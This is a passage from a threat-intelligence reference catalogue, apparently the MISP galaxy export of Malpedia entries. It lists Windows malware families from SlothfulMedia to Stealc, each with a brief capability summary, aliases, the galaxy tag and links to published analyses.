According to MITRE, SLOTHFULMEDIA is a remote access Trojan written in C++ that has been used by an unidentified "sophisticated cyber actor" since at least January 2017. It has been used to target government organizations, defense contractors, universities, and energy companies in Russia, India, Kazakhstan, Kyrgyzstan, Malaysia, Ukraine, and Eastern Europe.

The tag is: misp-galaxy:malpedia="SlothfulMedia"

SlothfulMedia is also known as:

  • QueenOfClubs

Table 4601. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.slothfulmedia

https://us-cert.cisa.gov/ncas/analysis-reports/ar20-275a

https://securelist.com/iamtheking-and-the-slothfulmedia-malware-family/99000/

SManager

The tag is: misp-galaxy:malpedia="SManager"

SManager is also known as:

  • PhantomNet

Table 4605. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.smanager

https://blog.vincss.net/2021/02/re020-elephantrat-kunming-version-our-latest-discovered-RAT-of-Panda.html

https://0xthreatintel.medium.com/how-to-unpack-smanager-apt-tool-cb5909819214

https://0xthreatintel.medium.com/reversing-apt-tool-smanager-unpacked-d413a04961c4

https://blog.vincss.net/2020/12/re018-2-analyzing-new-malware-of-china-panda-hacker-group-used-to-attack-supply-chain-against-vietnam-government-certification-authority.html?m=1

https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf

https://blog.group-ib.com/task

https://blog.vincss.net/2020/12/re017-2-phan-tich-ky-thuat-dong-ma-doc-moi-co-nhieu-dau-hieu-lien-quan-toi-nhom-tin-tac-Panda.html

https://blog.vincss.net/2020/12/re018-1-analyzing-new-malware-of-china-panda-hacker-group-used-to-attack-supply-chain-against-vietnam-government-certification-authority.html

https://labs.sentinelone.com/thundercats-hack-the-fsb-your-taxes-didnt-pay-for-this-op/

https://blog.vincss.net/2020/12/phan-tich-ky-thuat-dong-ma-doc-moi-co-nhieu-dau-hieu-lien-quan-toi-nhom-tin-tac-Panda.html

https://www.elastic.co/security-labs/introducing-the-ref5961-intrusion-set

https://insight-jp.nttsecurity.com/post/102glv5/pandas-new-arsenal-part-3-smanager

https://www.welivesecurity.com/2020/12/17/operation-signsight-supply-chain-attack-southeast-asia/

SMAUG

According to PCrisk, Smaug ransomware is available for download on the dark web: it is for sale as Ransomware as a Service (RaaS). Therefore, cyber criminals who purchase it can perform ransomware attacks without having to develop malware of this type. Smaug is designed to encrypt files, rename them and create a ransom message.

The tag is: misp-galaxy:malpedia="SMAUG"

SMAUG is also known as:

Table 4607. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.smaug

https://labs.sentinelone.com/multi-platform-smaug-raas-aims-to-see-off-competitors/

https://www.anomali.com/blog/anomali-threat-research-releases-first-public-analysis-of-smaug-ransomware-as-a-service

https://www.pwc.co.uk/issues/cyber-security-services/insights/what-is-behind-ransomware-attacks-increase.html

SMOKEDHAM

According to Mandiant, SMOKEDHAM is dropped through a powershell script that contains the (C#) source code for this backdoor, which is stored in an encrypted variable. The dropper dynamically defines a cmdlet and .NET class for the backdoor, meaning the compiled code is only found in memory.

The tag is: misp-galaxy:malpedia="SMOKEDHAM"

SMOKEDHAM is also known as:

Table 4608. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.smokedham

https://www.mandiant.com/resources/burrowing-your-way-into-vpns

https://www.mandiant.com/resources/darkside-affiliate-supply-chain-software-compromise

https://www.fireeye.com/blog/threat-research/2021/06/darkside-affiliate-supply-chain-software-compromise.html

SmokeLoader

The SmokeLoader family is a generic backdoor with a range of capabilities which depend on the modules included in any given build of the malware. The malware is delivered in a variety of ways and is broadly associated with criminal activity. The malware frequently tries to hide its C2 activity by generating requests to legitimate sites such as microsoft.com, bing.com, adobe.com, and others. Typically the actual Download returns an HTTP 404 but still contains data in the Response Body.

The tag is: misp-galaxy:malpedia="SmokeLoader"

SmokeLoader is also known as:

  • Dofoil

  • Sharik

  • Smoke

  • Smoke Loader

Table 4609. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.smokeloader

https://www.telekom.com/en/blog/group/article/a-new-way-to-encrypt-cc-server-urls-614886

https://www.bleepingcomputer.com/news/security/new-golang-botnet-empties-windows-users-cryptocurrency-wallets/

https://www.logpoint.com/en/blog/emerging-threat/defending-against-8base/

https://www.sentinelone.com/blog/going-deep-a-guide-to-reversing-smoke-loader-malware/

https://de.darktrace.com/blog/privateloader-network-based-indicators-of-compromise

https://www.fortinet.com/blog/threat-research/smokeloader-using-old-vulnerabilities

http://security.neurolabs.club/2019/10/dynamic-imports-and-working-around.html

https://m.alvar.es/2020/06/unpacking-smokeloader-and.html

https://securitynews.sonicwall.com/xmlpost/html-application-hta-files-are-being-used-to-distribute-smoke-loader-malware/

https://blog.malwarebytes.com/threat-analysis/2016/08/smoke-loader-downloader-with-a-smokescreen-still-alive/

https://www.spamhaus.org/news/article/774/smoke-loader-improves-encryption-after-microsoft-spoils-its-campaign

https://x0r19x91.in/malware-analysis/smokeloader/

https://www.proofpoint.com/us/threat-insight/post/2019-return-retefe

https://0xc0decafe.com/2020/12/23/detect-rc4-in-malicious-binaries

https://blog.malwarebytes.com/social-engineering/2020/09/malvertising-campaigns-come-back-in-full-swing/

https://www.ptsecurity.com/ww-en/analytics/antisandbox-techniques/

https://m.alvar.es/2019/10/dynamic-imports-and-working-around.html

https://drive.google.com/file/d/13BsHZn-KVLhwrtgS2yKJAM2_U_XZlwoD/view

https://malwareandstuff.com/examining-smokeloaders-anti-hooking-technique/

https://medium.com/csis-techblog/gcleaner-garbage-provider-since-2019-2708e7c87a8a

https://malwarebreakdown.com/2017/04/03/shadow-server-domains-leads-to-rig-exploit-kit-dropping-smoke-loader-which-downloads-neutrino-bot-aka-kasidet/

https://blog.talosintelligence.com/2020/09/salfram-robbing-place-without-removing.html

https://research.checkpoint.com/2019-resurgence-of-smokeloader/

https://www.bitsight.com/blog/tracking-privateloader-malware-distribution-service

https://www.microsoft.com/security/blog/2021/02/01/what-tracking-an-attacker-email-infrastructure-tells-us-about-persistent-cybercriminal-operations/

https://blogs.blackberry.com/en/2022/02/threat-thursday-arkei-infostealer

https://blogs.blackberry.com/en/2022/07/smokeloader-malware-used-to-augment-amadey-infostealer

https://m.alvar.es/2020/06/comparative-analysis-between-bindiff.html

https://www.cisa.gov/uscert/sites/default/files/publications/AA22-110A_Joint_CSA_Russian_State-Sponsored_and_Criminal_Cyber_Threats_to_Critical_Infrastructure_4_20_22_Final.pdf

https://blog.talosintelligence.com/2020/12/2020-year-in-malware.html

https://medium.com/csis-techblog/inside-view-of-brazzzersff-infrastructure-89b9188fd145

https://github.com/vc0RExor/Quick-Analysis/blob/main/SmokeLoader/SmokeLoader.md

https://www.rnbo.gov.ua/files/2023_YEAR/CYBERCENTER/october/The%20Surge%20in%20Smokeloader%20Attacks%20on%20Ukrainian%20Institutions%20UA.pdf

https://www.cert.pl/en/news/single/dissecting-smoke-loader/

https://n1ght-w0lf.github.io/malware%20analysis/smokeloader/

http://security.neurolabs.club/2019/08/smokeloaders-hardcoded-domains-sneaky.html

https://youtu.be/QOypldw6hnY?t=3237

https://cloudblogs.microsoft.com/microsoftsecure/2018/04/04/hunting-down-dofoil-with-windows-defender-atp/

https://suvaditya.one/malware-analysis/smokeloader/

https://hatching.io/blog/tt-2020-08-27/

https://info.phishlabs.com/blog/smoke-loader-adds-additional-obfuscation-methods-to-mitigate-analysis

https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf

https://embee-research.ghost.io/smokeloader-analysis-with-procmon/

https://www.deepinstinct.com/2021/05/26/deep-dive-packing-software-cryptone/

https://danusminimus.github.io/Analyzing-Modern-Malware-Techniques-Part-4/

https://malwarology.substack.com/p/malicious-packer-pkr_ce1a?r=1lslzd

https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-2021-threat-report.pdf

https://blog.malwarebytes.com/cybercrime/2018/01/fake-spectre-and-meltdown-patch-pushes-smoke-loader/

https://www.silentpush.com/blog/privacy-tools-not-for-you

https://asec.ahnlab.com/en/36634/

https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/paas-or-how-hackers-evade-antivirus-software/

https://blog.malwarebytes.com/threat-analysis/2016/10/new-looking-sundown-ek-drops-smoke-loader-kronos-banker/

http://security.neurolabs.club/2020/04/diffing-malware-samples-using-bindiff.html

https://blogs.vmware.com/security/2023/06/8base-ransomware-a-heavy-hitting-player.html

https://research.openanalysis.net/smoke/smokeloader/loader/config/yara/triage/2022/08/25/smokeloader.html

https://blog.talosintelligence.com/2018/07/smoking-guns-smoke-loader-learned-new.html

https://inside.harfanglab.io/blog/articles/cyber-threat-intelligence/loader-galore-taskloader-at-the-start-of-a-pay-per-install-infection-chain/

https://int0xcc.svbtle.com/a-taste-of-our-own-medicine-how-smokeloader-is-deceiving-dynamic-configuration-extraction-by-using-binary-code-as-bait

https://www.intel471.com/blog/Cobalt-strike-cybercriminals-trickbot-qbot-hancitor

https://blog.sekoia.io/privateloader-the-loader-of-the-prevalent-ruzki-ppi-service/

https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf

https://blog.badtrace.com/post/anti-hooking-checks-of-smokeloader-2018/

https://marcoramilli.com/2021/01/09/c2-traffic-patterns-personal-notes/

https://www.proofpoint.com/us/blog/threat-insight/now-you-see-it-now-you-dont-copperstealer-performs-widespread-theft

https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/operation-ta505-part3/

https://securelist.com/nullmixer-oodles-of-trojans-in-a-single-dropper/107498/

https://www.team-cymru.com/post/seychelles-seychelles-on-the-c-2-shore

https://eternal-todo.com/blog/smokeloader-analysis-yulia-photo

https://global.ahnlab.com/global/upload/download/asecreport/ASEC%20REPORT_vol.101_ENG.pdf

https://www.prodaft.com/m/reports/RIG_TLP_CLEAR-1.pdf

https://asec.ahnlab.com/en/33600/

https://embee-research.ghost.io/combining-pivot-points-to-identify-malware-infrastructure-redline-smokeloader-and-cobalt-strike/

https://www.cisa.gov/uscert/ncas/alerts/aa22-110a

https://blog.cluster25.duskrise.com/2023/10/12/cve-2023-38831-russian-attack

http://security.neurolabs.club/2020/06/unpacking-smokeloader-and.html

https://bartblaze.blogspot.com/2017/08/crystal-finance-millennium-used-to.html

https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware

https://unit42.paloaltonetworks.com/analysis-of-smoke-loader-in-new-tsunami-campaign/

https://intel471.com/blog/privateloader-malware

https://kcm.trellix.com/corporate/index?page=content&id=KB96190&locale=en_US

https://www.acronis.com/en-sg/cyber-protection-center/posts/8base-ransomware-stays-unseen-for-a-year/

Sn0wsLogger

The tag is: misp-galaxy:malpedia="Sn0wsLogger"

Sn0wsLogger is also known as:

Table 4612. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.sn0wslogger

https://twitter.com/struppigel/status/1354806038805897216

Snake

Snake Ransomware is a Golang ransomware reportedly containing obfuscation not typically seen in Golang ransomware. This malware will remove shadow copies and kill processes related to SCADA/ICS devices, virtual machines, remote management tools, network management software, and others. After this, encryption of files on the device commences, while skipping Windows system folders and various system files. A random 5 character string is appended to encrypted files. According to Bleeping Computer, this ransomware takes an especially long time to encrypt files on a targeted machine. This ransomware is reported to target an entire network, rather than individual workstations.

The tag is: misp-galaxy:malpedia="Snake"

Snake is also known as:

  • EKANS

  • SNAKEHOSE

Table 4613. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.snake

https://www.fireeye.com/blog/threat-research/2020/07/financially-motivated-actors-are-expanding-access-into-ot.html

https://ics-cert.kaspersky.com/alerts/2020/06/17/targeted-attacks-on-industrial-companies-using-snake-ransomware/

https://www.0ffset.net/reverse-engineering/analysing-snake-ransomware/

https://ics-cert.kaspersky.com/media/KASPERSKY_H1_2020_ICS_REPORT_EN.pdf

https://www.bleepingcomputer.com/news/security/snake-ransomware-is-the-next-threat-targeting-business-networks/

https://www.dragos.com/blog/industry-news/ekans-ransomware-misconceptions-and-misunderstandings/

https://www.crowdstrike.com/blog/adversaries-targeting-the-manufacturing-industry/

https://blog.malwarebytes.com/threat-analysis/2020/06/honda-and-enel-impacted-by-cyber-attack-suspected-to-be-ransomware/

https://ke-la.com/zooming-into-darknet-threats-targeting-jp-orgs-kela/

https://dragos.com/blog/industry-news/ekans-ransomware-and-ics-operations/

https://www.ccn-cert.cni.es/pdf/5045-ccn-cert-id-15-20-snake-locker-english-1/file.html

https://github.com/albertzsigovits/malware-notes/blob/master/Snake.md

https://twitter.com/bad_packets/status/1270957214300135426

https://twitter.com/milkr3am/status/1270019326976786432

https://labs.sentinelone.com/new-snake-ransomware-adds-itself-to-the-increasing-collection-of-golang-crimeware/

https://krebsonsecurity.com/2020/05/europes-largest-private-hospital-operator-fresenius-hit-by-ransomware

https://www.goggleheadedhacker.com/blog/post/22

https://www.fortinet.com/blog/threat-research/ekans-ransomware-targeting-ot-ics-systems

https://www.mandiant.com/resources/financially-motivated-actors-are-expanding-access-into-ot

https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf

https://www.bleepingcomputer.com/news/security/honda-investigates-possible-ransomware-attack-networks-impacted/

https://hub.dragos.com/hubfs/Whitepaper-Downloads/Dragos_Manufacturing%20Threat%20Perspective_1120.pdf

https://medium.com/@nishanmaharjan17/malware-analysis-snake-ransomware-a0e66f487017

https://insights.sei.cmu.edu/cert/2020/03/snake-ransomware-analysis-updates.html

https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-old-dogs-new-tricks.pdf

Snojan

The tag is: misp-galaxy:malpedia="Snojan"

Snojan is also known as:

Table 4619. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.snojan

https://medium.com/@jacob16682/snojan-analysis-bb3982fb1bb9

SnowFlake Stealer

Information stealer, written in Rust.

The tag is: misp-galaxy:malpedia="SnowFlake Stealer"

SnowFlake Stealer is also known as:

Table 4620. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.snowflake_stealer

https://github.com/Finch4/Malware-Analysis-Reports/blob/master/SnowFlake%20Stealer/SnowFlake%20Stealer%20Analysis.pdf

SNS Locker

The tag is: misp-galaxy:malpedia="SNS Locker"

SNS Locker is also known as:

Table 4621. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.snslocker

Sobaken

According to ESET, this RAT was derived from (the open-source) Quasar RAT.

The tag is: misp-galaxy:malpedia="Sobaken"

Sobaken is also known as:

Table 4622. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.sobaken

https://www.welivesecurity.com/2018/07/17/deep-dive-vermin-rathole/

Sobig

The tag is: misp-galaxy:malpedia="Sobig"

Sobig is also known as:

  • Palyh

Table 4623. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.sobig

http://edition.cnn.com/2003/TECH/internet/08/21/sobig.virus/index.html

Sockbot

Sockbot is a customized and in Go written fork of the Ligolo reverse tunneling open-source tool. Several modification were performed by the threat actors who rewrote that code, e.g. execution checks, hardcoded values. Ligolo: https://github.com/sysdream/ligolo

The tag is: misp-galaxy:malpedia="Sockbot"

Sockbot is also known as:

Table 4625. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.sockbot

https://www.bleepingcomputer.com/news/security/hackers-fork-open-source-reverse-tunneling-tool-for-persistence/

https://blog.talosintelligence.com/2022/03/iranian-supergroup-muddywater.html

https://secjoes-reports.s3.eu-central-1.amazonaws.com/Sockbot%2Bin%2BGoLand.pdf

https://www.youtube.com/watch?v=CAMnuhg-Qos

SodaMaster

This is a RAT that is usually loaded with one or more shellcode and/or reflective DLL injection techniques. The RAT uses RC4 or a hardcoded RSA key for traffic encryption/decryption. Its communication can either happen via a raw TCP socket or a HTTP POST request. Depending on the version, the RAT may remotely execute DLLs or shellcode.

The tag is: misp-galaxy:malpedia="SodaMaster"

SodaMaster is also known as:

  • DelfsCake

  • HEAVYPOT

  • dfls

Table 4628. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.sodamaster

https://www.secureworks.com/research/bronze-starlight-ransomware-operations-use-hui-loader

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/cicada-apt10-china-ngo-government-attacks

https://jsac.jpcert.or.jp/archive/2022/pdf/JSAC2022_9_yanagishita-tamada-nakatsuru-ishimaru_en.pdf

https://securelist.com/apt-trends-report-q1-2021/101967/

https://jsac.jpcert.or.jp/archive/2021/pdf/JSAC2021_202_niwa-yanagishita_en.pdf

https://www.bleepingcomputer.com/news/security/chinese-hackers-abuse-vlc-media-player-to-launch-malware-loader/

solarmarker

Unit 42 notes that they identified a new version of SolarMarker, a malware family known for its infostealing and backdoor capabilities, mainly delivered through search engine optimization (SEO) manipulation to convince users to download malicious documents.

Some of SolarMarker’s capabilities include the exfiltration of auto-fill data, saved passwords and saved credit card information from victims’ web browsers. Besides capabilities typical for infostealers, SolarMarker has additional capabilities such as file transfer and execution of commands received from a C2 server.

The malware invests significant effort into defense evasion, which consists of techniques like signed files, huge files, impersonation of legitimate software installations and obfuscated PowerShell scripts.

The tag is: misp-galaxy:malpedia="solarmarker"

solarmarker is also known as:

  • Jupyter

  • Polazert

  • Yellow Cockatoo

Table 4631. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.solarmarker

https://unit42.paloaltonetworks.com/solarmarker-malware/

https://security5magics.blogspot.com/2020/12/tracking-jupyter-malware.html

https://twitter.com/MsftSecIntel/status/1403461397283950597

https://news.sophos.com/en-us/2022/02/01/solarmarker-campaign-used-novel-registry-changes-to-establish-persistence/

https://blog.talosintelligence.com/2021/07/threat-spotlight-solarmarker.html#more

https://embee-research.ghost.io/shodan-censys-queries/

https://blogs.vmware.com/security/2023/11/jupyter-rising-an-update-on-jupyter-infostealer.html

https://blog.morphisec.com/jupyter-infostealer-backdoor-introduction

https://www.prodaft.com/m/reports/Solarmarker_TLPWHITEv2.pdf

https://www.binarydefense.com/mars-deimos-solarmarker-jupyter-infostealer-part-1/

https://blog.morphisec.com/new-jupyter-evasive-delivery-through-msi-installer

https://squiblydoo.blog/2021/06/20/mars-deimos-from-jupiter-to-mars-and-back-again-part-two/

https://www.binarydefense.com/mars-deimos-from-jupiter-to-mars-and-back-again-part-two/

https://www.cisecurity.org/insights/blog/top-10-malware-march-2022

https://blogs.blackberry.com/en/2022/01/threat-thursday-jupyter-infostealer-is-a-master-of-disguise

https://squiblydoo.blog/2022/09/27/solarmarker-the-old-is-new/

https://www.crowdstrike.com/blog/solarmarker-backdoor-technical-analysis/

https://www.esentire.com/security-advisories/hackers-flood-the-web-with-100-000-malicious-pages-promising-professionals-free-business-forms-but-are-delivering-malware-reports-esentire

https://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-solarmarker

https://blog.minerva-labs.com/new-iocs-of-jupyter-stealer

SolidBit

Ransomware, written in .NET.

The tag is: misp-galaxy:malpedia="SolidBit"

SolidBit is also known as:

Table 4632. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.solidbit

https://www.trendmicro.com/en_us/research/22/h/solidbit-ransomware-enters-the-raas-scene-and-takes-aim-at-gamer.html

Somnia

The tag is: misp-galaxy:malpedia="Somnia"

Somnia is also known as:

Table 4634. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.somnia

https://medium.com/walmartglobaltech/from-royal-with-love-88fa05ff7f65

soraya

The tag is: misp-galaxy:malpedia="soraya"

soraya is also known as:

Table 4636. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.soraya

https://www.codeandsec.com/Soraya-Malware-Analysis-Dropper

SPACESHIP

SPACESHIP searches for files with a specified set of file extensions and copies them to a removable drive. FireEye believes that SHIPSHAPE is used to copy SPACESHIP to a removable drive, which could be used to infect another victim computer, including an air-gapped computer. SPACESHIP is then used to steal documents from the air-gapped system, copying them to a removable drive inserted into the SPACESHIP-infected system

The tag is: misp-galaxy:malpedia="SPACESHIP"

SPACESHIP is also known as:

Table 4641. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.spaceship

https://www.mandiant.com/sites/default/files/2021-09/rpt-apt30.pdf

https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf

Spartacus

Spartacus is ransomware written in .NET and emerged in the first half of 2018.

The tag is: misp-galaxy:malpedia="Spartacus"

Spartacus is also known as:

Table 4647. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.spartacus

https://bartblaze.blogspot.com/2018/04/this-is-spartacus-new-ransomware-on.html

SPECTRALVIPER

The tag is: misp-galaxy:malpedia="SPECTRALVIPER"

SPECTRALVIPER is also known as:

Table 4648. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.spectralviper

https://www.elastic.co/fr/security-labs/elastic-charms-spectralviper

Spectre Rat

Mixed RAT and Botnet malware sold in underground forums. In march 2021 it was advertised with the Spectre 2.0, it reached version 3 in June 2021 and then quickly version 4. This crimeware tool was being abused in malicious campaigns targeting European users in September 2021.

The tag is: misp-galaxy:malpedia="Spectre Rat"

Spectre Rat is also known as:

Table 4649. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.spectre

https://yoroi.company/research/spectre-v4-0-the-speed-of-malware-threats-after-the-pandemics/

SPHijacker

According to Trend Micro, this is a tool designed to disable security products, adopting two approaches to achieve this purpose. One approach terminates the security product process by using a vulnerable driver, zamguard64.sys, published by Zemana (vulnerability designated as CVE-2018-5713). Meanwhile, another approach disables process launching by using a new technique that they named stack rumbling.

The tag is: misp-galaxy:malpedia="SPHijacker"

SPHijacker is also known as:

Table 4651. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.sphijacker

https://www.trendmicro.com/en_us/research/23/e/attack-on-security-titans-earth-longzhi-returns-with-new-tricks.html

Spicy Hot Pot

The tag is: misp-galaxy:malpedia="Spicy Hot Pot"

Spicy Hot Pot is also known as:

Table 4652. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.spicyhotpot

https://www.crowdstrike.com/blog/spicy-hot-pot-rootkit-explained/

SpyBot

The tag is: misp-galaxy:malpedia="SpyBot"

SpyBot is also known as:

Table 4655. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.spybot

SpyEye

SpyEye is a malware targeting both Microsoft Windows browsers and Apple iOS Safari. Originated in Russia, it was available in dark forums for $500+ claiming to be the "The Next Zeus Malware". It performed many functionalities typical from bankers trojan such as keyloggers, auto-fill credit card modules, email backups, config files (encrypted), http access, Pop3 grabbers and FTP grabbers. SpyEye allowed hackers to steal money from online bank accounts and initiate transactions even while valid users are logged into their bank account.

The tag is: misp-galaxy:malpedia="SpyEye"

SpyEye is also known as:

Table 4657. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.spyeye

https://krebsonsecurity.com/2010/04/spyeye-vs-zeus-rivalry/

https://www.f5.com/labs/articles/education/banking-trojans-a-reference-guide-to-the-malware-family-tree

https://www.sans.org/reading-room/whitepapers/malicious/clash-titans-zeus-spyeye-33393

https://krebsonsecurity.com/2010/09/spyeye-botnets-bogus-billing-feature/

https://www.symantec.com/connect/blogs/spyeye-bot-versus-zeus-bot

https://securelist.com/financial-cyberthreats-in-2020/101638/

https://www.pcworld.com/article/247252/spyeye_malware_borrows_zeus_trick_to_mask_fraud.html

http://malwareint.blogspot.com/2010/02/spyeye-bot-part-two-conversations-with.html

https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan%3AWin32%2FSpyeye

https://krebsonsecurity.com/2011/04/spyeye-targets-opera-google-chrome-users/

https://www.computerworld.com/article/2509482/spyeye-trojan-defeating-online-banking-defenses.html

https://www.justice.gov/opa/pr/four-individuals-plead-guilty-rico-conspiracy-involving-bulletproof-hosting-cybercriminals

Squirrelwaffle

According to Sophos, Squirrelwaffle is a malware loader that is distributed as a malicious Office document in spam campaigns. It provides attackers with an initial foothold in a victim’s environment and a channel to deliver and infect systems with other malware. When a recipient opens a Squirrelwaffle-infected document and enables macros, a visual basic script typically downloads and executes malicious files and scripts, giving further control of the computer to an attacker. Squirrelwaffle operators also use DocuSign to try and trick the user into enabling macros in Office documents.

The tag is: misp-galaxy:malpedia="Squirrelwaffle"

Squirrelwaffle is also known as:

  • DatopLoader

Table 4658. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.squirrelwaffle

https://redcanary.com/blog/intelligence-insights-november-2021/

https://blog.talosintelligence.com/2021/10/squirrelwaffle-emerges.html

https://blog.minerva-labs.com/a-new-datoploader-delivers-qakbot-trojan

https://github.com/0xjxd/SquirrelWaffle-From-Maldoc-to-Cobalt-Strike/raw/main/2021-10-02%20-%20SquirrelWaffle%20-%20From%20Maldoc%20to%20Cobalt%20Strike.pdf

https://www.malware-traffic-analysis.net/2021/09/17/index.html

https://www.trendmicro.com/en_us/research/21/k/Squirrelwaffle-Exploits-ProxyShell-and-ProxyLogon-to-Hijack-Email-Chains.html

https://redcanary.com/blog/intelligence-insights-december-2021

https://www.zscaler.com/blogs/security-research/squirrelwaffle-new-loader-delivering-cobalt-strike

https://www.mcafee.com/blogs/other-blogs/mcafee-labs/the-newest-malicious-actor-squirrelwaffle-malicious-doc/

https://www.symantec.broadcom.com/hubfs/SED/SED_Threat_Hunter_Reports_Alerts/SED_FY22Q2_SES_Ransomware-Threat-Landscape_WP.pdf

https://twitter.com/Max_Mal_/status/1442496131410190339

https://www.netskope.com/blog/squirrelwaffle-new-malware-loader-delivering-cobalt-strike-and-qakbot

https://www.cynet.com/understanding-squirrelwaffle/

https://blogs.blackberry.com/en/2021/11/threat-thursday-squirrelwaffle-loader

https://www.0ffset.net/reverse-engineering/malware-analysis/squirrelwaffle-main-loader/

https://security-soup.net/squirrelwaffle-maldoc-analysis/

https://news.sophos.com/en-us/2022/02/15/vulnerable-exchange-server-hit-by-squirrelwaffle-and-financial-fraud/

https://www.youtube.com/watch?v=9X2P7aFKSw0

https://www.cybereason.com/blog/threat-analysis-report-datoploader-exploits-proxyshell-to-deliver-qbot-and-cobalt-strike

https://twitter.com/jhencinski/status/1464268732096815105

https://www.0ffset.net/reverse-engineering/malware-analysis/squirrelwaffle-custom-packer/

https://certitude.consulting/blog/en/unpatched-exchange-servers-distribute-phishing-links-squirrelwaffle/

https://elis531989.medium.com/the-squirrel-strikes-back-analysis-of-the-newly-emerged-cobalt-strike-loader-squirrelwaffle-937b73dbd9f9

https://www.sentinelone.com/blog/is-squirrelwaffle-the-new-emotet-how-to-detect-the-latest-malspam-loader/

SquirtDanger

According to PaloAlto, SquirtDanger is a commodity botnet malware family that comes equipped with a number of characteristics and capabilities. The malware is written in C# (C Sharp) and has multiple layers of embedded code. Once run on the system, it will persist via a scheduled task that is set to run every minute. SquirtDanger uses raw TCP connections to a remote command and control (C2) server for network communications.

The tag is: misp-galaxy:malpedia="SquirtDanger"

SquirtDanger is also known as:

Table 4659. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.squirtdanger

https://researchcenter.paloaltonetworks.com/2018/04/unit42-squirtdanger-swiss-army-knife-malware-veteran-malware-author-thebottle/

sRDI

sRDI allows for the conversion of DLL files to position independent shellcode. It attempts to be a fully functional PE loader supporting proper section permissions, TLS callbacks, and sanity checks. It can be thought of as a shellcode PE loader strapped to a packed DLL.

The tag is: misp-galaxy:malpedia="sRDI"

sRDI is also known as:

  • DAVESHELL

Table 4660. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.srdi

https://www.mandiant.com/resources/blog/apt29-evolving-diplomatic-phishing

https://www.mandiant.com/resources/blog/dprk-whatsapp-phishing

https://github.com/monoxgas/sRDI

https://www.welivesecurity.com/en/eset-research/lazarus-luring-employees-trojanized-coding-challenges-case-spanish-aerospace-company/

StalinLocker

The tag is: misp-galaxy:malpedia="StalinLocker"

StalinLocker is also known as:

  • StalinScreamer

Table 4664. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.stalin_locker

https://www.bleepingcomputer.com/news/security/stalinlocker-deletes-your-files-unless-you-enter-the-right-code/

StarCruft

The tag is: misp-galaxy:malpedia="StarCruft"

StarCruft is also known as:

Table 4666. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.starcruft

https://securelist.com/operation-daybreak/75100/

StartPage

Potentially unwanted program that changes the startpage of browsers to induce ad impressions.

The tag is: misp-galaxy:malpedia="StartPage"

StartPage is also known as:

  • Easy Television Access Now

Table 4669. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.startpage

https://www.bleepingcomputer.com/virus-removal/remove-search-searchetan.com-chrome-new-tab-page

Stealc

Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth’s statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.

Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.

The tag is: misp-galaxy:malpedia="Stealc"

Stealc is also known as:

Table 4672. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

https://cocomelonc.github.io/book/2023/12/13/malwild-book.html

https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-2/

https://github.com/muha2xmad/Python/blob/bdc7a711d5a775f8ae47b591f20fdd2e1360b77b/Stealc/stealc_config_extractor.ipynb

